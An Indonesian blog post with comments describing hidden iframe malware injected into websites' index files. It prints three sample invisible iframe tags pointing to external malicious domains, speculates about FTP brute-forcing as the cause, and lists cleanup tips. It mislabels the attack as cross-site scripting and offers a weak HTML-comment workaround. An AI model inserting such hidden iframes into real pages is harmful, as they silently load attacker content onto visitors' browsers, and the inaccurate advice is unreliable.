Bahaya Malware ramai menyerang website atau blog
Akhir-akhir ini banyak sekali website atau blog yang terkena script injection di halaman webnya yang mengakibatkan web tersebut diblokir oleh browser karena terdeteksi sebagai Malware. Tentunya hal ini akan merugikan dan bisa mengurangi jumlah visitor di web/blog tersebut.
Beberapa contoh kode malware yang disisipkan ke file web yang biasanya dalam format tag iframe
<iframe src=”http://ruisjop.com/?click=452887″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<iframe src=”http://crazeyt.com/?click=E02DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<iframe src=”http://thedeadpit.com/?click=19568171″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
Jika ditelusuri alamat URL di dalam iframe tersebut, maka tidak akan muncul apa-apa alias domain tersebut tidak bisa diakses dari browser. Dan jika web yang terinfeksi tersebut diakses melalui browser akan muncul pesan warning
Pesan warning di Google Chrome:
Warning: Visiting this site may harm your computer!
Pesan warning di Mozilla Firefox:
Reported Attack Site!
Fenomena ini sungguh di luar dugaan, karena saya juga mempunya beberapa web juga terkena serangan injeksi script tadi, dan anehnya script ini hanya muncul di file index.
Serangan yang bisa disebut Cross Site Scripting (XSS) attack ini kemungkinan disebabkan adanya bot (program) yang secara random menyerang beberapa situs untuk berusaha memasuki FTP dengan menggunakan urutan kombinasi password (brute password attack), sehingga jika password cpanel terlalu mudah seperti ‘love’ (tanpa quote) maka bot tersebut akan menyisipkan kode iframe di file index di seluruh folder. Atau bisa juga disebabkan karena virus trojan atau spyware di PC yang mampu melacak password FTP saat sedang membuka FTP yang kemudian virus tersebut mengirim informasi password tersebut ke servernya. Kemungkinan lain disebabkan serangan hacking oleh para hacker/cracker yang dengan sengaja ingin menjebol FTP dengan segala cara yang mampu mereka gunakan.
Untuk mengatasi serangan injeksi ini, ada beberapa tips yang bisa dipakai
- Upload ulang semua file web/blog anda ke server
- Ganti semua password cpanel hosting serta database dengan karakter acak gabungan antara huruf, angka serta karakter, kalau bisa ganti juga password admin web/blog anda
- Tambahkan kode <!– setelah tag penutup </html>, sehingga jika ada injeksi script tersebut, maka kode virus tersebut akan dianggap sebagai comment dalam HTML. Tapi tidak menutup kemungkinan browser akan tetap mendeteksi kode malware tersebut.
Kalo ada yang tahu penyebab pasti serangan ini serta solusinya, silakan kasih comment di bawah ini 
tambahan:
ganti semua password anda dengan password yang sangat secure, contohnya spt ini:
V4tH+p+atReTruG@5W8bethEB7e?7K69aN5c#=Ru+E-a&4Cruq+p@AtA$R&sa-#=
qu=!#h@w-saphe*abAcutr4seth*thEthapusukaVuspes#u=u_en@jeSeWethUx
St6ste+wuvuRAceg?-6z!XecR4C4eqUd*yU-u4=T5#2uMaPrETaTrU5ej9+AC!U-
dijamin aman deh =))
hahahaha bisa aja bro yg satu ini,,, andaikan saja panjang maksimal password ga di batasi saya juga ma pake password kamu bro =))
dijamin sampai dunia kiamat pun password itu gak bakalan ketemu walopun udah pake mesin password tercepat wkwkwkwkwkwkw
[...] Original Post: http://blog.walnutz.net/bahaya-malware-ramai-menyerang-website-atau-blog.html [...]
web saya juga kena malware seperti itu je
tapi file php juga kena encrypt
solusinya coba reset semua password di php, mysql serta hostingnya,,,,
selain itu gunakan random password yang acak,,